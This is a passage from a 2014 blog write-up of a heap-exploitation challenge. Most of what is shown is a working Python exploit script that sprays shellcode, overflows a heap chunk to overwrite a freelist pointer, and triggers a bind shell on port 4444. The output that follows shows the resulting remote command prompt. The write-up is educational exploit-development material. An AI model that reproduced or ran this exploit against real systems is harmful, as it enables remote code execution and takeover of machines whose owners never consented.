    "\xb5\xb8\x0b\xac\x25\x46\xc6\x74\x55\x0d\x4a\xdc\xfe\xc8\x1f"
    "\x5c\x63\xeb\xca\xa3\x9a\x68\xfe\x5b\x59\x70\x8b\x5e\x25\x36"
    "\x60\x13\x36\xd3\x86\x80\x37\xf6"
    )
    shellcode = hexlify(shellcode) # encode shellcode
    
    print "%s" % s.recv(1024)
    
    # 0) Spray the shellcode
    for i in range(20):
        payload = " deadbeef" + "20" + "90"*(2039 - len(shellcode)/2) + shellcode
        s.sendall("HTER " + payload)
        print "%s" % s.recv(1024)
    
    # 1) Allocate chunk A
    s.sendall("KSTET " + "A"*8 + "\x00")
    print "%s" % s.recv(1024)
    
    # 2) Allocate and free chunk B
    s.sendall("GMON " + "A"*8 + "\x00")
    print "%s" % s.recv(1024)
    
    # 3) Overflow chunk A and overwrite chunk B's flink
    s.sendall("GTER " + "A"*8 + "B"*8 + target)
    print "%s" % s.recv(1024)
    
    # 4) Allocate chunk B and chunk C. Overwrite the target.
    s.sendall("STATS " + scaddr)
    print "%s" % s.recv(1024)
    
    # 5) Trigger the shellcode
    s.sendall("HELP" + "\x00")
    
    s.close()
    

    After running the above exploit, you should be able to see port 4444 opened with the shellcode listening on the other end:

    C:\>netstat -an
    
    Active Connections
    
      Proto  Local Address          Foreign Address        State
      TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
      TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
      TCP    0.0.0.0:2869           0.0.0.0:0              LISTENING
      TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING
      TCP    0.0.0.0:9999           0.0.0.0:0              LISTENING
      :
      :
    
    C:\>telnet localhost 4444
    
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\serve_heap>
    

    Special Note

    Thank you, Steven Seeley (mr_me), both for the fun challenge and for sharing your research on heap exploitation. You rock!

    Published on June 18th, 2014 by iphelix


    All original content on this site is copyright protected and licensed under Creative Commons - Attribution, NonCommercial, ShareAlike 4.0 International.
